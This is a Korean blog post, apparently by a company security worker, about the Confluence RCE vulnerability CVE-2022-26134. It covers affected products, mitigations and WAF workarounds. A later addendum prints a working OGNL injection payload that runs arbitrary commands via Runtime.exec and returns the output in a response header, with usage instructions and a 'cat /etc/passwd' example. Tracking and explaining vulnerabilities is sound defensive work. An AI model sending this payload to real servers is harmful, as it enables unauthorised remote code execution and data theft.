CVE-2022-26134 Confluence 취약점 (내용추가)

6월 2일에 Confluence 관련 취약점이 나왔다. 우리회사에서도 해당 제품을 사용하고 있기 때문에 찾아 봤지만

실제 페이로드가 나와있는 곳은 없었다. 아직 패치가 나오기도 전이고 따끈따끈한 내용인거 같아서 대충 정리한다...

 

그나마 자세한 내용이

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 여기에 있다.

 

CVE-2022-26134 unauthenticated, remote code execution vulnerability

RCE 취약점 이라고 한다. 대충봐도 위험하다는 느낌이 든다.

 

Affected Versions

이게 블로그마다 달라서 어떤게 정확한지는 모르겠는데, 위의 링크에 달린 블로그에 의하면 모든 LTS 버전에서 가능한 것으로 보인다. 라고 작성되어 있다. 나도 테스트해보긴 어려우니..... 가져다 써야지

 

Affected Products

요거는 Confluence 공홈에 나온 그대로 작성한다.

• Confluence
  • Confluence Server
  • Confluence Data Center

Mitigation

1. 현재까지 패치가 나온건 없고, 우선 Confluence가 인터넷에서 접근 가능한 경우, 인터넷과의 접점을 없애라고한다.

2. 그리고 Cloudflare 에서는 자체적으로 WAF에서 룰을 추가해서 막았다고한다.
Cloudflare 내용 : https://blog.cloudflare.com/cloudflare-customers-are-protected-from-the-atlassian-confluence-cve-2022-26134/

3. 인터넷에서 접점을 없애는게 불가능하면 WAF에 ${ 요 문자가 URL 타고 들어오는걸 막으라는데 뭐 이런건 우회가 가능할수도 있으니 임시방편이라고 볼 수 있다.

 

취약점 관련 내용

실제 해당 Zero-day를 사용해서 공격한 사람은 RCE를 통해 webshell을 메모리에 올려서 공격하려고 했던 것 같다. 현재 나온 내용이 매우적어서 블로그에도 뭐 적을게 없다. 추후에 내용이 추가된다면 블로그에 추가하겠다 ^-^

우리회사에서도 어떻게 대응하는지 봐야겠다 ㅋㅋㅋㅋ 어차피 대응은 내가 안해~~~

 

--20220605 추가

간밤사이에 PoC가 나왔다. 주말이라서 실제로 테스트 까지는 귀찮고......

우선 Payload는 OGNL Injection 이라고 한다. OGNL(Object-Graph Navigation Language)은 스트러츠2에서 사용하는 표현식인데

대충 어떤방식으로 공격이 이루어지는 건지는 아래의 블로그를 보는게 더 빠르다.

https://securitynote.tistory.com/27

PoC

실제 페이오르는 아래와 같다.

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("{}").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))} 

 

Host 뒤에 GET 방식을 통해 위의 페이로드를 보내면되며, 볼드체로 작성한 Exec("{}") 부분에 명령어를 넣으면된다.

ex) exec("cat /etc/passwd") 요런식으로 넣으면 된다.

 

실제 클라우드형 Confluence 다운받아서 실험해보는건 다음주에 해보자.....!!!!!

그리고 자세한 분석도 가능하면 다음주에 해보쟈~~~